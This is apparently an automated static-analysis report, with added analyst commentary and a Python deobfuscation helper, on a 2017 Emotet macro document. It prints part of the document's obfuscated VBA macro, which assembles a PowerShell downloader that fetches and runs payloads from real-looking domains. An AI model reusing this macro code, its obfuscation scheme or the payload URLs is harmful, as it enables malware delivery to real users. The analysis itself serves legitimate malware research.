Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 15d49a5d2e14aea3…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 91.5 KB
Created: 2017-11-09 15:26:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: c3bc4dfc3f89a6a1d429b86b8e951199
SHA-1: c343a8c42a74efcd0eb00d93e5ebc8bf2479784a
SHA-256: 15d49a5d2e14aea33c42d6a90df39930f4be1d0a342803f43306f54c18ecd068
Risk score: 244

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample carries a VBA project whose AutoOpen entry point runs as soon as the document is opened with macros enabled; together with the spearphishing delivery this is the Emotet maldoc pattern of late 2017. The critical heuristic OLE_VBA_SHELL flags the Shell() call, and the extracted source below shows what it launches: a PowerShell command assembled at runtime from Mid() slices of junk-padded strings, glued together with never-assigned variables (VBA treats them as empty, so they add nothing). The recovered fragments contain new-object System.Net.WebClient, .DownloadFile(, Invoke-Item, a try/catch that breaks out after the first successful download, a drop path built from $env:public and new-object random, and a comma-separated list of payload URLs (monitoreointeligente.com.ar, remont-shlangov.ru and several others cut off by the preview). The command is wrapped in three layers of string concatenation that use placeholder tokens for the quote character (7M0, wfd) and the dollar sign (Ktq, JCl), each layer handed to an Invoke-Obfuscation-style launcher that spells out iex from $ShellId, $env:PUBLIC or $VerbosePreference. The ClamAV detection name Doc.Macro.Emotet-6374344-0 supports the family attribution; because the document is only the downloader, the Emotet binary itself is not inside it and can only be confirmed from the second stage.

Two of the weaker findings need reading in context. OLE_LEGACY_WORDBASIC_AUTOEXEC is triggered by the same AutoOpen name in the legacy Word stream; its generic description (no VBA project recovered) does not hold for this sample, since the project was extracted, so it adds no evidence beyond OLE_VBA_AUTOOPEN. The 34 base64-like blobs reported for macros.bas are the alphanumeric junk strings that Mid() slices, not encoded payloads, and ClamAV's clean result on the decoded source is not contradictory: the Doc.Macro signature fired on the original OLE file, and the olevba-decoded text is a different byte stream.

Heuristics (8)

  • ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main, channel: document text (OLE body). This is the DrawingML XML namespace URI that Office writes into drawing parts, not a network indicator; the payload URLs of this sample exist only inside the macro strings.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 51255 bytes
SHA-256: 5f822a27e6914aef0c49170394a112e379fede2a16b767882b3fbdecb7362d8f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 34 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IfAEzLjvV"
Function iFCNHnzZS()
MqITtjM = "" + CRwUjkW + Mid("DR27KK5YrSr71nsVpMUVCHsokULcJXwKv9sQf", 11, 2) + mGcPltr + UDknDXG
mnvstSMsC = "" + InddJMj + Mid("ItKF24ZmUBVQ4MimoX2SvtVKMC 343245);K7M0+7M0tqhuas = Kt7M0+7M0qenv7M0wfd+wfd+7M0:public 7M0+7M0+ fo7'+'M0+7M0wfd+wfdh7M0+7M0r'+'JAfoh7M0+7M0 7M0+7M0+ Ktqk7M0+7M0ar7M0+7K9fm", 27, 141) + KUonRSh + iubNjtR
ZGCnwhSDh = "" + JZOucpi + Mid("LRfKI+'M0-JoIn7M07M0)wfd) -'+'RepLacewfd7M0wfd,'+'[ChAR]'+'39-cREPl'+'ACe([Ch'+'AR'+']72+7rVdGf5j9DzRsrQCbwq", 6, 84) + GzjXsXj + LPozNIO
bdiZFbiQN = "" + zlQcWSw + Mid("RHs1),[Ch'+'AR]36))') -RepLAce'JCl',[char]36-cRePlAce'wfd',[char]39)|&( $shelLid[1]+$ShelLID[13]+'X')vAw7B68sjC", 4, 98) + FIThPRs + kwcmich
fLfhSqjOF = "" + jlmwlmV + Mid("hta6nQtGfKILlbwTlj8k09sjSVztRM0+7M0u/Uamu'+'Kwfd+wfd7M0+7M0Mpu/,httpJYFG7VfMl", 30, 39) + fuwZoiU + zzzITPq
MsjHILdHwA = "" + AlqvPOG + Mid("0oCCQAYKibcGEa7Ktq'+'bcd){try{7M0+7M0Ktqf7M0+7M0ranc7M0+7M0.Down'+'wfd+wfd7M0+7M0loadFile(Ktqabcwfd+wfd.T7M0+7M0oS7M0+7M0t7M0+7M0r7M0+'+'7M0ingwfd+wfd(7M0+7M0)wi0zsCmLfjdzj", 16, 144) + jMlGtvG + rppALTm
GVRDFcENW = "" + SYAbISW + Mid("QEdIWV6BHN05EcnEquivqPjuMXhaR]39).RePLAce(7M0rJA7M0,7M047t'+'7M0).RePLAc'+'e(7M0Ktq7M0,[stRIngwfd+wfd][ChaR]36) H1Y& ( Vo3VerboSepReFErEnCE.toStwfd+wfdR'+'i'+'nG()[1,3]+'+'7M0X7'REUKN", 27, 152) + GEwRGzb + SbWvFwh
jBLNYC = "" + AkLUjzV + Mid("kGd+wfd7M0+7M0t K7M0+7M0tq_7M0+7M0.Ex7M0+7M0cept7M0+7M0i7M0+7M0o7M0+7M0n7M0+7M'+'0.wfd+3ENwKhCLuaMqSqfBhjc6d16nairo8", 3, 85) + vrLDDzk + ZJDCfBW
urtJHAtDi = "" + kkPkvFP + Mid("Yr2asQ1T[ChAR]49+[ChAR]89),[ChAR]124  -RepLa'+'ce([jUqiwWYmX5X5VDBHFGKrq2IYtiHL", 9, 43) + kAzwpli + jEwVuGE
dFnNA = "" + muGRiuE + Mid("At71iYMBLqnsadawfd+wfdsd 7M0+7M0= 7M0+7M0n'+'ew-ob7M0+7M0ject r7M0+7M0andom7M0+7MHZ", 10, 72) + TfsIjvv + XiGUhih
amiINnv = "" + PdcKCka + Mid("zkQafWi95kB4YEjaKcmmU99r1wfdMess7M0+7M0wfd+w'+'fda7M0+7M0ge;'+'}7M0+7M0}7M0).RePLAce(7M0foh7M0,[wfd+wfdstRIng][CaCdEj7UlQUL1b", 26, 87) + XTFRQJR + roFulcZ
aZZUwVtPj = "" + sWczjzz + Mid("bmXrYPA, Ktqh7M'+'0+7M0uas7M0+7M0);Iwfd+wf'+'dnvoke-I7M'+'0+7M0te7M'+'0+7M0m(Kt7M0+7M0qhu7M0+'+'7M0as);break;}c7M0+7M0atch{wr7M0'+'+'+'7M0ite-hoswfVzL", 8, 140) + OkHKjGs + tLfodcf
hwduwfEF = "" + Rotcnjs + Mid("5mhrT+7wfd+wfdM0i7M0+7M0e7M0+7M0n7'+'M0+7M0t;Ktwfd+wfd7M0+7M0YBpjl", 6, 56) + NaoaTQO + zorrzsh
ZohkRVsnvfh = "" + vAovHaq + Mid("dY2O0RGre/Tx7M0+7M0Kvj/'+'foh.7M0+7M0Split(f7M0+7M0oh,f7M0+7M0oh);K7'+'M0+wfd+wf'+'d7M0t7wfd+wfdM0+7M0q7M0+7M0k7M0+7M0a7M0+7M0rapas = K7M0+7M0tq'+'7M0+7M0nsawfd+wfdda7M0+7M0sd'+'.ne'+'7M0+7M0xt(17M0+7M0,PPK9uwk5GvVH", 8, 196) + aSstQnw + zGQDAGF
SiaFE = "" + CClHUIX + Mid("5q48NbDjQwfd+w'+'fd0wfd+wfd+7M0O/7M0+7M0,h7M0+7M0ttp://mo7M0+7M0nit'+'o7M0+7M0reointelig'+'ente.c7M0+7M0om.ar/7M0+7M0gkN7M0+7M0uNKlYK/,7'+'M0+7M'+'0htt7M0+7M0pwfd+wfd://eda7M0+7M0vspb.vWpNiUzs", 10, 175) + tzTJWYc + asJmlsJ
XmuLZ = "" + Stmzfzz + Mid("QuBdXiZZr522AXJwBWtI (('. ( JClenv:PUbLIC[13]+JCleNV:'+'PublIC[5]+'+'wfdxwfd)(((wfd (7M0K'+'7M0+7M0tq7M0+7M0fr7M0+7M0anc = new7M0+7M0-ob7M0+7M0ject Syste7M0+7M0m.Net.Web7M0wfd+wfd+7M0Cl7M097Yo", 21, 168) + jlXhdJf + ziWzjKG
HWzUqSOjD = "" + AoMMsPc + Mid("IbZQXCb0quTj10Q4WFAfiOjZ7M0+7M0:7M0+7M0//re7M0+7M0mon7M0+7M0t-sh7M0+7M0la7M0+7M0n'+'go7M0+wfd+wfd7M0v.7M0+7M0ru/Q/,7M0+7M0http:7M0+7M0//7'+'M0+7M0www.l7M0+7M0edpu7jijJRfwbr", 25, 139) + KEqZppL + KFatIuU
XALmv = "" + nUSqvOf + Mid("LWYFjw4nE0;K7M0+wfd+wfd7M0t7M0+7wfd+wfdM0qb7M'+'0+7M0c7M0+7M0d7wfd+wfdM0+7M0 7Mwfd+wfd0+7M0= fo7M0+7M0hhttp7M0+7M0://wfd+wfdremont-br7M0wfd+wfd+7M0i'+'7M0+7M0tv.'+'r7bIN6hRQqu", 10, 157) + zPiUMTK + qdCfvzf
zriUmw = "" + bRwFYKb + Mid("vfpt9EwcdN8O7pM0+7M0blicid'+'ad'+'7M0+7M0.'+'com/7M0+7M0j7M0+7M0t7M0+7M0vsZ7Mnn5T2hHZG", 15, 63) + rUvowZc + vZmlBRh
HJhtbaUCC = "" + jpZUtvi + Mid("pF74M0+7M0u/7M0+7'+'
... (truncated)
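Added analyst helper, not part of the report tooling or of the sample: it emulates VBA Mid() over the preview line quoted from above and unwraps the three concatenation layers seen in the fragments. The placeholder meanings JCl and Ktq to $, wfd to ' and H1Y to | are read directly off the visible -replace/.Replace calls; 7M0 to ' is inferred from the [ChAR]39 replace calls, and the layer order and the Windows default values of $ShellId and $env:PUBLIC are assumptions. The fragments marked constructed are copied from inside the visible Mid() strings without applying the Mid() offsets.

```python
"""Unwrap the Emotet macro's layered PowerShell (added example, not report code).

Layer A is the string VBA hands to Shell(): '...'+'...' literals, then
-replace 'JCl',[char]36 and -creplace 'wfd',[char]39, piped to iex.
Layer B is that result: its '+' joins, then 7M0->' (assumed) and H1Y->| .
Layer C is that result: its '+' joins, then .Replace('Ktq', '$').
"""
import re

# Mid("<string>", <start>, <len>) as written in the preview; strings there never
# contain a double quote, so a plain [^"]* body is enough.
MID_CALL = re.compile(r'Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)')

# Quoted verbatim from the preview (line "MqITtjM = ...").
PREVIEW_LINE = ('MqITtjM = "" + CRwUjkW + Mid("DR27KK5YrSr71nsVpMUVCHsokULcJXwKv9sQf", 11, 2)'
                ' + mGcPltr + UDknDXG')

# Constructed: substrings lifted from inside visible Mid() strings, offsets not applied.
CONSTRUCTED_FRAGMENTS = [
    "(7M0K'+'7M0+7M0tq7M0+7M0fr7M0+7M0anc = new7M0+7M0-ob7M0+7M0ject "
    "Syste7M0+7M0m.Net.Web7M0wfd+wfd+7M0Cl",
    "//re7M0+7M0mon7M0+7M0t-sh7M0+7M0la7M0+7M0n'+'go7M0+wfd+wfd7M0v.7M0+7M0ru/Q/",
    "JClenv:PUbLIC[13]+JCleNV:'+'PublIC[5]+'+'wfdxwfd",
]


def vba_mid(text: str, start: int, length: int) -> str:
    """VBA Mid(): 1-indexed start; a length past the end returns the remainder."""
    if start < 1:
        raise ValueError("VBA Mid() start is 1-indexed")
    return text[start - 1:start - 1 + length]


def extract_mid_slices(vba_source: str) -> list[str]:
    """Return every Mid() result in source order; everything else on the line is junk
    (never-assigned variables evaluate to "" in VBA)."""
    return [vba_mid(s, int(a), int(b)) for s, a, b in MID_CALL.findall(vba_source)]


def unwrap_powershell(fragment: str) -> str:
    """Replay the three concatenation layers on one fragment (order is assumed)."""
    s = fragment.replace("'+'", "")                    # layer A: join literals
    s = s.replace("JCl", "$").replace("wfd", "'")      # layer A: -replace calls
    s = s.replace("'+'", "")                           # layer B: join literals
    s = s.replace("7M0", "'").replace("H1Y", "|")      # layer B: 7M0 assumed, H1Y visible
    s = s.replace("'+'", "")                           # layer C: join literals
    return s.replace("Ktq", "$")                       # layer C: .Replace('Ktq', '$')


def pick_chars(source: str, indices: list[int], suffix: str) -> str:
    """Model launchers of the form $var[i]+$var[j]+'x' that spell out iex."""
    return "".join(source[i] for i in indices) + suffix


def main() -> None:
    print("Mid() slices from the quoted line:", extract_mid_slices(PREVIEW_LINE))
    for frag in CONSTRUCTED_FRAGMENTS:
        print(unwrap_powershell(frag))
    # Windows defaults assumed for the two environment-derived launchers in the preview.
    print("$ShellId launcher:    ", pick_chars("Microsoft.PowerShell", [1, 13], "X"))
    print("$env:PUBLIC launcher: ", pick_chars(r"C:\Users\Public", [13, 5], "x"))


if __name__ == "__main__":
    main()
```

Run over the full macros.bas, the slices come out in assignment order, but the final concatenation that orders them is in the truncated part of the module, so the URL list and the command skeleton must be read from the unwrapped fragments rather than reassembled blindly. The $VerbosePreference.ToString()[1,3]+'X' launcher from the preview is the third Invoke-Obfuscation form and is not modelled here because it relies on PowerShell array indexing rather than single character picks.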